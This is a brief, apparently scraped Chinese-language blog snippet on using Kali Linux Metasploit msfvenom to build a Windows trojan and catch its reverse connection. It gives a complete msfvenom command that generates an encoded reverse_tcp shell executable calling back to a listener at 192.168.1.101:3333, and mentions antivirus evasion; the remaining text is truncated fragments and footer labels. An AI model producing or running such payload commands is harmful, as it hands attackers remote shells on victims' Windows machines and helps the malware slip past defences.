Kali Linux -- Metasploit MSFvenom Generate a Trojan horse and receive a rebound(生成木马和接收反弹)

生成         msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/1.exeshell 免杀 参照老版本,没有看官方文档windows msfpayloadwi
相关文章
相关标签/搜索